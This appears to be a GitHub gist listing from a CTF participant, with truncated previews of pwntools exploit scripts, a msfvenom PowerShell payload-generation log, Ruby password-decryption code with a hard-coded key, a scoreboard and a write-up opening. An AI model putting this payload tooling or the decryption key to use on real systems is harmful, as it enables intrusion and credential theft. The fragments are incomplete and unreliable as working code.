I hereby claim:
- I am dwendt on github.
- I am dwn (https://keybase.io/dwn) on keybase.
- I have a public key ASBWYRBdrYcszXAvxjy6REZ4jFQx7DGWnvfF0slVL9T_9Ao
To claim this, I am signing this object:
from pwn import * | |
import IPython | |
import sha | |
import sys | |
import itertools | |
import string | |
from base64 import b64encode | |
from base64 import b64decode | |
from schnorr import * |
from pwn import * | |
from pow import solve_pow | |
#from network_util import * | |
import struct | |
#fd = open("m68k.bin", "r") | |
#shellcode = fd.read() | |
#fd.close() | |
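def p32(v):
    """Pack the integer *v* as a 4-byte big-endian word.

    Accepts the full 32-bit range, i.e. negative values in
    -2**31 .. -1 (emitted as two's complement) as well as unsigned
    values up to 0xFFFFFFFF; the original ">i" format rejected anything
    above 0x7FFFFFFF, which rules out most high addresses.

    Args:
        v: integer to pack.

    Returns:
        4 bytes, most significant byte first.

    Raises:
        struct.error: if *v* does not fit in 32 bits (same exception
            type the bare struct.pack call raised).

    NOTE(review): this deliberately overrides the p32 that
    ``from pwn import *`` exports (pwntools packs little-endian by
    default); the commented-out m68k shellcode load above suggests a
    big-endian target — confirm before relying on it elsewhere.
    """
    if not -0x80000000 <= v <= 0xFFFFFFFF:
        raise struct.error("p32: value %r does not fit in 32 bits" % (v,))
    # Mask so negative inputs map to their two's-complement bit pattern,
    # then pack unsigned so 0x80000000..0xFFFFFFFF are accepted too.
    return struct.pack(">I", v & 0xFFFFFFFF)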
No platform was selected, choosing Msf::Module::Platform::Windows from the payload | |
No Arch selected, selecting Arch: x86 from the payload | |
Found 1 compatible encoders | |
Attempting to encode payload with 1 iterations of cmd/powershell_base64 | |
cmd/powershell_base64 succeeded with size 333 (iteration=0) | |
cmd/powershell_base64 chosen with final size 333 | |
Payload size: 333 bytes | |
Final size of psh file: 2374 bytes | |
$NHEpDZWJXk = @" | |
[DllImport("kernel32.dll")] |
require 'openssl' | |
require 'base64' | |
require 'rexml/document' | |
include REXML | |
# pull this from seed.properties
# NOTE(review): hard-coded key material in source; the comment above says
# the real value lives in seed.properties — confirm this literal is only a
# local stand-in and not committed as the production seed.
SEED = 'EB3452127614E25A' | |
def decrypt(cpass) |
require 'openssl' | |
require 'base64' | |
# NOTE(review): hard-coded key material in source (the sibling snippet says
# it should be pulled from seed.properties) — confirm it is not a real secret.
SEED = 'EB3452127614E25A' | |
# Base64-encoded inputs for decrypt below ('base64' is required above);
# presumably ciphertexts under SEED — TODO confirm against decrypt's body.
strings = ["TWMQJJtbRUD5FJur/SuWmW53rumcHkzZGS6TqK3CTvM=", "ZGG8VSEQSeJL45huJFIl3oLX0UE5tVlchKvXsGdYprQ=", "HybRUpUK8tXT0++qaOX+vNYYclDJsx2gBfLFc8j8N34=", "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA="] | |
# Same value as the last element of `strings`.
encryptedString = "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA=" | |
def decrypt(cpass) |
I hereby claim:
To claim this, I am signing this object:
{ | |
"standings": [ | |
{ | |
"id": 393, | |
"pos": 1, | |
"score": 1905, | |
"team": "eipiplus1equals0" | |
}, | |
{ | |
"id": 135, |
For this pwnable we've got a zip with AppJailLauncher.exe and thing2.exe. This means we get to experience the wonders of ASLR+DEP+Win8.1 🔥 tl;dr ruby solution
// Memoization cache for deBruijn below, keyed by maxlen.toString().
// NOTE(review): assigned without var/let/const, so this is an implicit
// global (a ReferenceError under strict mode) — confirm that is intended.
memoArr = {}; | |
// Alphabet the pattern is built from; the order matters for offset lookup.
var charset = "A%sB$nC-(D;)Ea0Fb1Gc2Hd3Ie4Jf5Kg6Lh7Mi8Nj9OkPlQmRnSoTpUqVrWsXtYuZvwxyz"; // default gdb-peda charset | |
function deBruijn (charset, maxlen, n) { | |
var k = charset.length; | |
var a = []; | |
for (var i = 0; i < k * n; i++) a.push(0); | |
if (maxlen.toString() in memoArr) | |
return memoArr[maxlen.toString()]; | |
for (var k in memoArr) { |